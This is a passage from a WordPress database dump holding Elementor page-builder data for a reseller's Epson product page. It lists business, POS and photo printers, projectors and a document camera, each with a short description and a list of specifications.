center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7825,3461,'_elementor_version','2.5.14'),(7828,3462,'_wp_page_template','template-fullwidth.php'),(7829,3462,'_elementor_edit_mode','builder'),(7830,3462,'_elementor_template_type','post'),(7831,3462,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; 